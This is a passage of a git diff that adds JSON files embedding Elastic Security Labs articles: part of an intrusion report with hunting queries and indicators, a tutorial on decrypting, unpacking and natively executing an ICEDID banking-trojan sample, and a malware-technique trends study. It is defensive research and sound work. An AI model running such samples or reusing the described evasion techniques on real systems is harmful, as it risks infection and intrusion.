Windows Error Manager](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml)\n* [Potential Lateral Movement via SMBExec](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/lateral_movement_potential_lateral_movement_via_smbexec.toml)\n* [Suspicious Cmd Execution via WMI](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_cmd_execution_via_wmi.toml)\n* [RunDLL32 with Unusual Arguments](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_with_unusual_arguments.toml)\n* [Suspicious PowerShell Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_powershell_execution.toml)\n\n### Hunting queries in Elastic\n\nHunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n#### ES|QL queries\n\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below ES|QL queries to hunt for similar behaviors:\n\n```\nFROM logs-*\n WHERE process.parent.name == \"sqlservr.exe\" \n AND process.name == \"cmd.exe\" \n AND process.command_line \n RLIKE \".*certutil.*\"\n```\n\n```\nFROM logs-*\n WHERE process.name == \"ms_edge.exe\" \n AND process.code_signature.exists == false \n AND NOT process.executable \n RLIKE \".*Program Files.*\"\n```\n\n#### YARA\n\nElastic Security has created the following YARA rules to identify this activity:\n\n* [Windows.Trojan.CobaltStrike](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_CobaltStrike.yar)\n* [Windows.Hacktool.SleepObfLoader](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_SleepObfLoader.yar)\n* [Multi.Hacktool.Nps](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Nps.yar)\n* [Multi.Hacktool.Rakshasa](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Hacktool_Rakshasa.yar)\n* [Windows.Hacktool.Iox](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Iox.yar)\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ref0657) in both ECS and STIX format in a combined zip bundle.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-------------|-------------|--------------------------------------------|\n| 206.237.3[.]150 | ipv4-addr | | File hosting infrastructure |\n| 206.237.0[.]49 | ipv4-addr | | File hosting and supershell infrastructure |\n| 104.21.54[.]126 | ipv4-addr | | Cobalt Strike infrastructure |\n| 149.104.23[.]176 | ipv4-addr | | |\n| msedge[.]one | domain-name | | Cobalt Strike infrastructure |\n| bc90ef8121d20af264cc15b38dd1c3a866bfe5a9eb66064feb2a00d860a0e716 | SHA-256 | mscoree.dll | |\n| 84b3bc58ec04ab272544d31f5e573c0dd7812b56df4fa445194e7466f280e16d | SHA-256 | MSASN1.dll | |\n\n## About Elastic Security Labs\n\nElastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.\n\nFollow Elastic Security Labs on Twitter [@elasticseclabs](https://twitter.com/elasticseclabs?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor) and check out our research at [www.elastic.co/security-labs/](https://www.elastic.co/security-labs/). "
+ },
+ "title": "Unmasking a Financial Services Intrusion: REF0657",
+ "slug": "unmasking-financial-services-intrusion-ref0657",
+ "subtitle": "Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.",
+ "date": "2024-01-31",
+ "description": "Elastic Security Labs details an intrusion leveraging open-source tooling and different post-exploitation techniques targeting the financial services industry in South Asia.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "photo-edited-08@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref0657",
+ "nps",
+ "cobalt strike",
+ "iox",
+ "rakshasa",
+ "supershell"
+ ]
+ },
+ "id": "security_labs_content-unmasking_financial_services_intrusion_ref0657-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unpacking_icedid-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unpacking_icedid-md.json
new file mode 100644
index 00000000000..c2c38868aa6
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unpacking_icedid-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unpacking ICEDID\"\nslug: \"unpacking-icedid\"\ndate: \"2023-05-04\"\nsubtitle: \"A comprehensive tutorial with Elastic Security Labs open source tools\"\ndescription: \"ICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. We are releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID.\"\nauthor:\n - slug: cyril-francois\nimage: \"photo-edited-07@2x.jpg\"\ncategory:\n - slug: tools\ntags:\n - icedid\n---\n\n## Preamble\n\nICEDID is a malware family [discovered](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/)in 2017 by IBM X-force researchers and is associated with the theft of login credentials, banking information, and other personal information. ICEDID has always been a prevalent family but achieved even more growth since EMOTET’s temporary [disruption](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation) in early 2021. ICEDID has been linked to the distribution of several distinct malware families including [DarkVNC](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc) and [COBALT STRIKE](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot). Regular industry reporting, including research publications like this one, help mitigate this threat.\n\nICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. Following our latest [ICEDID research](https://www.elastic.co/security-labs/thawing-the-permafrost-of-icedid-summary) that covers the GZip variant execution chain.\n\nIn this tutorial, we will introduce these tools by unpacking a recent ICEDID sample starting with downloading a copy of the fake GZip binary:\n\n**Analyzing malware can be dangerous to systems and should only be attempted by experienced professionals in a controlled environment, like an isolated virtual machine or analysis sandbox. Malware can be designed to evade detection and infect other systems, so it's important to take all necessary precautions and use specialized tools to protect yourself and your systems.**\n\n[**54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f**](https://bazaar.abuse.ch/sample/54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f/)\n\n## Environment setup\n\nFor this tutorial, we’re using Windows 10 and Python 3.10.\n\nElastic Security Labs is releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID.\n\n| Script | Description | Compatibility |\n| ----------------------------------------- | ---------------------------------------------------------------- | ------------------------------- |\n| decrypt_file.py | Decrypt ICEDID encrypted file | Windows and others (not tested) |\n| gzip_variant/extract_gzip.py | Extract payloads from ICEDID fake GZip file | Windows and others (not tested) |\n| gzip_variant/extract_payload_from_core.py | Extract and decrypt payloads from the rebuilt ICEDID core binary | Windows and others (not tested) |\n| gzip_variant/load_core.py | Load and execute core custom PE binary | Windows only |\n| gzip_variant/read_configuration.py | Read ICEDID configuration file contained in the fake GZip | Windows and others (not tested) |\n| rebuild_pe.py | Rebuild a PE from ICEDID custom PE file | Windows and others (not tested) |\n\nIn order to use the tools, clone the [Elastic Security Lab release repository](https://github.com/elastic/labs-releases) and install the nightMARE module.\n\n```\ngit clone https://github.com/elastic/labs-releases\ncd labs-release\npip install .\\nightMARE\\\n```\n\n> All tools in this tutorial use the **nightMARE** module, this library implements different algorithms we need for unpacking the various payloads embedded within ICEDID. We’re releasing nightMARE because it is required for this ICEDID analysis, but stay tuned - more to come as we continue to develop and mature this framework.\n\n## Unpacking the fake GZip\n\nThe ICEDID fake GZip is a file that [masquerades](https://attack.mitre.org/techniques/T1036/008/) as a valid GZip file formatted by encapsulating the real data with a [GZip header and footer](https://docs.fileformat.com/compression/gz/).\n\n\n\nGZip magic bytes appear in red. \nThe GZip header is rendered in green. \nThe dummy filename value is blue.\n\nAfter the GZip header is the true data structure, which we describe below.\n\n\n\nWe will use the **labs-releases\\tools\\icedid\\gzip-variant\\extract_gzip.py** script to unpack this fraudulent GZip.\n\n```\nusage: extract_gzip.py [--help] input output\n\npositional arguments:\n input Input file\n output Output directory\n\noptions:\n -h, --help show this help message and exit\n```\n\nWe'll use extract_gzip.py on the ICEDID sample linked above and store the contents into a folder we created called “ **extract** ” (you can use any existing output folder).\n\n```\npython extract_gzip.py 54d064799115f302a66220b3d0920c1158608a5ba76277666c4ac532b53e855f extract\n\n============================================================\nFake Gzip\n============================================================\nis_dll: True\ncore: UponBetter/license.dat (354282 bytes)\nstage_2: lake_x32.tmp (292352 bytes)\n\nextract\\configuration.bin\nextract\\license.dat\nextract\\lake_x32.tmp\n```\n\nThis script returns three individual files consisting of:\n\n- The encrypted configuration file: **configuration.bin**\n- The encrypted core binary: **license.dat**\n- The persistence loader: **lake_x32.tmp**\n\n\n\n## Decrypting the core binary and configuration files\n\nThe configuration and the core binary we extracted are encrypted using ICEDID’s custom encryption scheme. We can decrypt them with the **labs-releases\\tools\\icedid\\decrypt_file.py** script.\n\n```\nusage: decompress_file.py [--help] input output\n\npositional arguments:\n input Input file\n output Output file\n\noptions:\n -h, --help show this help message and exit\n```\n\nAs depicted here (note that decrypted files can be written to any valid destination):\n\n```\npython .\\decrypt_file.py .\\extract\\license.dat .\\extract\\license.dat.decrypted\n\npython .\\decrypt_file.py .\\extract\\configuration.bin .\\extract\\configuration.bin.decrypted\n```\n\nThe core binary and the configuration are now ready to be processed by additional tools. See the data from the decrypted configuration presented in the following screenshot:\n\n\n\n## Reading the configuration\n\nThe configuration file format is presented below.\n\n\n\nThe configuration can be read using the **labs-releases\\tools\\icedid\\gzip-variant\\read_configuration.py** script.\n\n```\nusage: read_configuration.py [--help] input\n\npositional arguments:\n input Input file\n\noptions:\n -h, --help show this help message and exit\n```\n\nWe’ll use the **read_configuration.py** script to read the **configuration.bin.decrypted** file we collected in the previous step.\n\n```\npython .\\gzip-variant\\read_configuration.py .\\extract\\configuration.bin.decrypted\n\n============================================================\nConfiguration\n============================================================\nbotnet_id: 0x3B7D6BA4\nauth_var: 0x00000038\nuri: /news/\ndomains:\n alishaskainz.com\n villageskaier.com\n```\n\nThis configuration contains two C2 domains:\n\n- alishaskainz[.]com\n- villageskaier[.]com\n\nFor this sample, the beaconing URI that ICEDID uses is “ **/news/** ”.\n\n## Rebuilding the core binary for static analysis\n\nICEDID uses a custom PE format to obfuscate its payloads thus defeating static or dynamic analysis tools that expect to deal with a normal Windows executable. The custom PE file format is described below.\n\n\n\nIf we want to analyze the core binary, for example with [IDA Pro](https://hex-rays.com/IDA-pro/), we need to rebuild it into a valid PE. We use the **labs-releases\\tools\\icedid\\rebuild_pe.py** script.\n\n```\nusage: rebuild_pe.py [--help] [-o OFFSET] input output\n\npositional arguments:\n input Input file\n output Output reconstructed PE\n\noptions:\n -h, --help show this help message and exit\n -o OFFSET, --offset OFFSET\n Offset to real data, skip possible garbage\n```\n\nHowever, when attempting to use **rebuild_pe.py** on the decrypted core binary, **license.dat.decrypted** , we receive the following error message:\n\n```\npython .\\rebuild_pe.py .\\extract\\license.dat.decrypted .\\extract\\core.bin\nTraceback (most recent call last):\n File \"rebuild_pe.py\", line 32, in \n main()\n File \"rebuild_pe.py\", line 28, in main\n custom_pe.CustomPE(data).to_pe().write(args.output)\n File \"nightmare\\malware\\icedid\\custom_pe.py\", line 86, in __init__\n raise RuntimeError(\"Failed to parse custom pe\")\nRuntimeError: Failed to parse custom pe\n```\n\nThe subtlety here is that the custom PE data doesn’t always start at the beginning of the file. In this case, for example, if we open the file in a hexadecimal editor like [HxD](https://mh-nexus.de/en/hxd/) we can observe a certain amount of garbage bytes before the actual data.\n\n\n\nWe know from our research that the size of the garbage is **129** bytes.\n\n\n\nWith that in mind, we can skip over the garbage bytes and rebuild the core binary using the **rebuild_pe.py** script using the **“-o 129”** parameter. This time we, fortunately, receive no error message. **core.bin** will be saved to the output directory, **extract** in our example.\n\n```\npython .\\rebuild_pe.py .\\extract\\license.dat.decrypted .\\extract\\core.bin -o 129\n```\n\nThe rebuilt PE object is **not** directly executable but you can statically analyze it using your disassembler of choice.\n\n\n\nWe assigned custom names to the rebuilt binary sections ( **.mare\\{0,1,2,...\\}** ).\n\n\n\nWe want to credit and thank [Hasherezade’s work](https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp#L10) from which we took inspiration to build this tool.\n\n## Executing the core binary (Windows only)\n\nThe core binary can’t be executed without a custom loader that understands ICEDID’s custom PE format as well as the entry point function prototype.\n\nFrom our research, we know that the entry point expects a structure we refer to as the context structure, which contains ICEDID core and persistence loader paths with its encrypted configuration. The context structure is described below.\n\n\n\nTo natively execute the core binary we use the **labs-releases\\tools\\icedid\\gzip-variant\\load_core.py** script, but before using it we need to create the **context.json** file that’ll contain all the information needed by this script to build this structure.\n\nFor this sample, we copy the information contained in the fake gzip and we use the path to the encrypted configuration file. We’ve included an example at **gzip_variant/context.json.example**.\n\n\n\nPlease note that **“field_0”** and **“stage_2_export”** values have to be found while reversing the sample.\n\n\n\nHere we use values from our previous research as placeholders but we have no guarantee that the sample will work 100%. For example, in this sample, we don’t know if the **#1** ordinal export is the actual entry point of the persistence loader.\n\nWe also reproduce the first stage behavior by creating the **UponBetter** directory and moving the **license.dat** file into it.\n\n\n\nWe execute the **labs-releases\\tools\\icedid\\gzip_variant\\load_core.py** script using the **decrypted core** binary: **license.dat.decrypted** , the **context.json** file.\n\n**WARNING: The binary is going to be loaded/executed natively by this script, Elastic Security Labs does not take responsibility for any damage to your system. Please execute only within a safe environment.**\n\n```\nusage: load_core.py [--help] [-o OFFSET] core_path ctx_path\n\npositional arguments:\n core_path Core custom PE\n ctx_path Path to json file defining core's context\n\noptions:\n -h, --help show this help message and exit\n -o OFFSET, --offset OFFSET\n Offset to real data, skip possible garbage\n```\n\nBecause we have the same garbage bytes problem as stated in the previous section, we use the **“-o 129”** parameter to skip over the garbage bytes.\n\n```\npython .\\gzip-variant\\load_core.py .\\extract\\license.dat.decrypted .\\gzip-variant\\context.example.json -o 129\n\n============================================================\nCore Loader\n============================================================\nBase address: 0x180000000\nEntrypoint: 0x180001390\n\nPress a key to call entrypoint...\n```\n\nWhen launched, the script will wait for user input before calling the entry point. We can easily attach a debugger to the Python process and set a breakpoint on the ICEDID core entry point (in this example **0x180001390** ).\n\n\n\nOnce the key is pressed, we reach the entry point.\n\n\n\nIf we let the binary execute, we see ICEDID threads being created (indicated in the following screenshot).\n\n\n\n## Unpacking and rebuilding payloads from the rebuilt core binary\n\nFor extracting any of the payloads that are embedded inside the core binary, we will use the **labs-releases\\tools\\icedid\\gzip-variant\\extract_payloads_from_core.py** script\n\n```\nusage: extract_payloads_from_core.py [--help] input output\n\npositional arguments:\n input Input file\n output Output directory\n\noptions:\n -h, --help show this help message and exit\n```\n\nWe’ll use this script on the rebuilt core binary.\n\n```\npython .\\gzip-variant\\extract_payloads_from_core.py .\\extract\\core.bin core_extract\n\ncore_extract\\browser_hook_payload_0.cpe\ncore_extract\\browser_hook_payload_1.cpe\n```\n\nFrom here, we output two binaries corresponding to ICEDID’s payloads for web browser hooking capabilities, however, they are still in their custom PE format.\n\n\n\nBased on our research, we know that **browser_hook_payload_0.cpe** is the x64 version of the browser hook payload and **browser_hook_payload_1.cpe** is the x86 version.\n\n\n\nIn order to rebuild them, we use the **rebuild_pe.py** script again, this time there are no garbage bytes to skip over.\n\n```\npython .\\rebuild_pe.py .\\core_extract\\browser_hook_payload_0.cpe .\\core_extract\\browser_hook_payload_0.bin\n\npython .\\rebuild_pe.py .\\core_extract\\browser_hook_payload_1.cpe .\\core_extract\\browser_hook_payload_1.bin\n```\n\nNow we have two PE binaries ( **browser_hook_payload_0.bin** and **browser_hook_payload_1.bin** ) we can further analyze.\n\n\n\nAttentive readers may observe that we have skipped the **VNC server** unpacking from the core binary, a decision we made intentionally. We will release it along with other tools in upcoming research, so stay tuned!\n\n## Conclusion\n\nIn this tutorial we covered ICEDID GZip variant unpacking, starting with the extraction of the fake GZip binary, followed by the reconstruction of the core binary and unpacking its payloads.\n\nICEDID is constantly evolving, and we are going to continue to monitor major changes and update our tooling along with our research. Feel free to [open an issue](https://github.com/elastic/labs-releases/issues) or [send us a message](mailto:threat-notification@elastic.co) if something is broken or doesn’t work as expected.\n\nElastic Security Labs is a team of dedicated researchers and security engineers focused on disrupting adversaries through the publication of detailed detection logic, protections, and applied threat research.\n\nFollow us on [@elasticseclabs](https://twitter.com/elasticseclabs)and visit our research portal for more resources and research.\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf](https://www.elastic.co/pdf/elastic-security-labs-thawing-the-permafrost-of-icedid.pdf)\n- [https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/](https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/)\n- [https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation](https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation)\n- [https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc](https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc)\n- [https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot)\n- [https://github.com/elastic/labs-releases](https://github.com/elastic/labs-releases)\n- [https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp](https://github.com/hasherezade/funky_malware_formats/blob/f1cacba4ee347601dceacda04e4de8c699971d29/iced_id_parser/iceid_to_pe.cpp)\n- [https://mh-nexus.de/en/hxd/](https://mh-nexus.de/en/hxd/)\n- [https://hex-rays.com/IDA-pro/](https://hex-rays.com/IDA-pro/)\n"
+ },
+ "title": "Unpacking ICEDID",
+ "slug": "unpacking-icedid",
+ "subtitle": "A comprehensive tutorial with Elastic Security Labs open source tools",
+ "date": "2023-05-04",
+ "description": "ICEDID is known to pack its payloads using custom file formats and a custom encryption scheme. We are releasing a set of tools to automate the unpacking process and help analysts and the community respond to ICEDID.",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ }
+ ],
+ "image": "photo-edited-07@2x.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ }
+ ],
+ "tags": [
+ "icedid"
+ ]
+ },
+ "id": "security_labs_content-unpacking_icedid-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unveiling_malware_behavior_trends-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unveiling_malware_behavior_trends-md.json
new file mode 100644
index 00000000000..183ebf32ba4
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-unveiling_malware_behavior_trends-md.json
@@ -0,0 +1,25 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Unveiling malware behavior trends\"\nslug: \"unveiling-malware-behavior-trends\"\ndate: \"2024-03-20\"\nsubtitle: \"Analyzing a Windows dataset of over 100,000 malicious files\"\ndescription: \"An analysis of a diverse dataset of Windows malware extracted from more than 100,000 samples revealing insights into the most prevalent tactics, techniques, and procedures.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"Security Labs Images 20.jpg\"\ncategory:\n - slug: security-research\n---\n\n## Preamble\n\nWhen prioritizing detection engineering efforts, it's essential to understand the most prevalent tactics, techniques, and procedures (TTPs) observed in the wild. This knowledge helps defenders make informed decisions about the most effective strategies to implement - especially where to focus engineering efforts and finite resources.\n\nTo highlight these prevalent TTPs, we analyzed over [100,000 Windows malware samples](https://gist.github.com/Samirbous/eebeb8f776f7ab2d51cdd2ac05669dcf) extracted over several months from one of our dynamic malware analysis tools, [Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate). To generate this data and alerts, we leveraged Elastic Defend behavior (mapped to MITRE ATT&CK) and [memory threat detection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection) rules. It should be noted that this dataset is not exhaustive, it may not represent the entire spectrum of malware behavior, and specifically does not include long-term or interactive activity.\n\nBelow an [ES|QL](https://www.elastic.co/blog/esql-elasticsearch-piped-query-language) query to summarize our dataset by file type:\n\n\n\n\n## Tactics\n\nBeginning with tactics, we aggregated the alerts generated by this corpus of malware samples and organized them according to the counts of [```process.entity_id```](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id) and alerts. As depicted in the image below, the most frequent tactics included defense evasion, privilege escalation, execution, and persistence. Certain tactics commonly linked with post-exploitation activities, such as lateral movement, provided an anticipated lower prevalence because these actions are commonly manually driven by the threat actor after the initial implant is established vs. being automated by the malware in our dataset.\n\n\n\n\nIn the following sections, we will delve into each tactic and the techniques and sub-techniques of each that exerted the most influence.\n\n### Defense Evasion\n\nDefense Evasion involves methods employed by adversaries to avoid detection by security teams or capabilities. The foremost tactic detected was defense evasion, triggering 189 distinct detection rules (nearly 40% of our current Windows rules). The primary techniques noted are associated with [code injection](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1055%22&type=code), [defense tampering](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Impair+Defenses%22&type=code), [masquerading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Masquerade+Task+or+Service%22&type=code), and [system binary proxy execution](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218%22&type=code).\n\n\n\n\nWhen we pivot by sub-techniques, it becomes evident that certain advanced techniques such as [DLL side-loading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22DLL+Side-Loading%22&type=code&p=1) and [Parent PID Spoofing](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20%22Parent%20PID%20Spoofing%22&type=code) have become increasingly popular, even among non-targeted malwares. Both are frequently linked with code injection and masquerading.\n\nFurthermore, system binary proxies [```Rundll32```](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.011%22&type=code) and [```Regsvr32```](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.010%22&type=code) remain highly abused, with a notable rise in the utilization of malicious [MSI installers](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1218.007%22&type=code) for malware delivery. The practice of [masquerading](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Masquerade+Task+or+Service%22&type=code) as legitimate system binaries, whether through renaming or process hollowing, remains prevalent as well, serving as a means to evade user suspicion.\n\n\n\n\nTampering with Windows Defender stands out as the most frequently observed defense evasion tactic, emphasizing the importance for defenders to acknowledge that adversaries will attempt to obscure their activities. \n\nProcess Injection is prevalent across various malware families, whether they target legitimate system binaries remotely to blend in or employ self-injection (sometimes paired with DLL side-loading through a trusted binary). Furthermore, there is a noticeable uptick in the use of NTDLL unhooking to bypass security solutions reliant on user-mode APIs monitoring (Elastic Defend is not impacted).\n\n\n\n\nFrom our shellcode alerts we can clearly see that self-injection is more prevalent than remote: \n\n\n\n\nAlmost 50 unique vendors’ binaries abused for DLL side-loading, of which Microsoft is the top choice: \n\n\n\n\nDefense evasion comprises various techniques and sub-techniques necessitating comprehensive coverage due to their frequent occurrence. For instance, apart from [memory threat protection](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html#memory-protection), [half](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts++name+%3D+%22Defense+Evasion%22&type=code) of our rules are specifically tailored to address this tactic.\n\n### Privilege Escalation\n\nThis tactic consists of techniques that adversaries use to gain greater permissions on a system or network. The most commonly used techniques relate to [access token manipulation](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1134%22&type=code), execution through privileged [system services](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1543.003%22&type=code), and bypassing [User Account Control](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1548.002%22&type=code).\n\n\n\n\nThe most frequently observed sub-technique involved impersonation as the Trusted Installer service, which aligns closely with defense evasion and often precedes attempts to manipulate system-protected resources. \n\nConcerning User Account Control bypass, the primary method we observed was elevation by [mimicking trusted directories](https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e), which is also related to DLL side-loading. Additionally, other methods like elevation via [extended startupinfo](https://github.com/decoder-it/psgetsystem) (elevated parent PID spoofing) are increasingly prevalent among commodity malware.\n\n\n\n\nAs evident from the list below, there's a notable rise in the use of [vulnerable drivers](https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks) (BYOVD) to manipulate protected objects and acquire kernel mode execution privileges. \n \n\n\n\nBelow, you'll find a list of the most commonly exploited drivers triggered by our [YARA rules](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20vulndriver&type=code):\n\n\n\n\n### Execution\n\nExecution encompasses methods that lead to running adversary-controlled code on a local or remote system. These techniques are frequently combined with methods from other tactics to accomplish broader objectives, such as network reconnaissance or data theft. \n\nThe most common techniques observed here involved [Windows command and scripting languages](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Command+and+Scripting+Interpreter%22+%5B%22windows%22%5D&type=code), with the proxying of execution via the [Windows Management Instrumentation](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1047%22&type=code) (WMI) interface closely trailing behind.\n\n\n\n\n[Powershell](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.001%22&type=code) remains a preferred scripting language for malware execution chains, followed by [Javascript](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.007%22&type=code) and [VBscript](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1059.005%22&type=code). Multi-stage malware delivery routinely involves a combination of two or more scripting languages.\n\n\n\n\nHere is a list of the most frequently triggered endpoint behavior detections for this tactic:\n\n\n\n\nWindows' default scripting languages remain the top preference for malware execution. However, there has been a slight uptick in the shift towards using other third-party scripting interpreters like Python, AutoIt, Java and Lua.\n\n### Persistence\n\nIt's common for malware to install itself on an infected host. No surprises here: the most frequently observed persistence methods include [scheduled tasks](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1053.005%22&type=code), the [run key and startup folder](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1547.001%22&type=code), and [Windows services](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1543.003%22&type=code) (which typically require administrator privileges).\n\n\n\n\nThe top three persistence sub-techniques depicted in the list below are also commonly encountered in regular software installations. Therefore, it's necessary to dissect them into multiple detections with additional suspicious signals to reduce false positives and enhance precision.\n\n\n\n\n### Initial Access\n\nConsidering the dataset's composition, initial access was associated with primarily macro-enabled documents and Windows shortcut objects. Although a significant portion of the detonated samples also involved other formats, such as ISO/VHD containers with MSI installers extensively utilized for delivery, their genuine malicious behavior typically manifests in areas such as defense evasion and persistence.\n\n\n\n\nThe most frequently abused Microsoft-signed binaries originating from malicious Microsoft Office documents align closely with execution and defense evasion tactics, command and scripting interpreters, and system binary proxy execution.\n\n\n\n\nHere is a list of the most frequently triggered detections for initial access, regarding [phishing attachments](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1566.001%22&type=code):\n\n\n\n\n### Credential Access\n\nCredential access in malware is frequently linked to information stealers. The most targeted credentials are typically associated with [Windows Credential Manager](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1555.004%22&type=code) and [browser password](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1555.003%22&type=code) stores. Domain and system-protected credentials require elevated privileges and are more likely a feature of a subsequent stage.\n\n\n\n\nBelow a breakdown of the endpoint behavior detections that triggered the most on credentials access: \n\n\n\n\nThe majority of credentials access behaviors resemble typical file access events. Therefore, it's essential to correlate and enrich them with additional signals to reduce false positives and enhance comprehension.\n\n## Conclusion\n\nEven though this small dataset of about [100,000 malware samples](https://gist.github.com/Samirbous/eebeb8f776f7ab2d51cdd2ac05669dcf) represents only a fraction of the possible malware in the wild right now, we can still derive important insights from it about the most common TTPs using our behavioral detections. Those insights help us make decisions about detection engineering priorities, and defenders should make that part of their strategies."
+ },
+ "title": "Unveiling malware behavior trends",
+ "slug": "unveiling-malware-behavior-trends",
+ "subtitle": "Analyzing a Windows dataset of over 100,000 malicious files",
+ "date": "2024-03-20",
+ "description": "An analysis of a diverse dataset of Windows malware extracted from more than 100,000 samples revealing insights into the most prevalent tactics, techniques, and procedures.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "Security Labs Images 20.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-unveiling_malware_behavior_trends-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-update_to_the_ref2924_intrusion_set_and_related_campaigns-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-update_to_the_ref2924_intrusion_set_and_related_campaigns-md.json
new file mode 100644
index 00000000000..42825da0e33
--- /dev/null
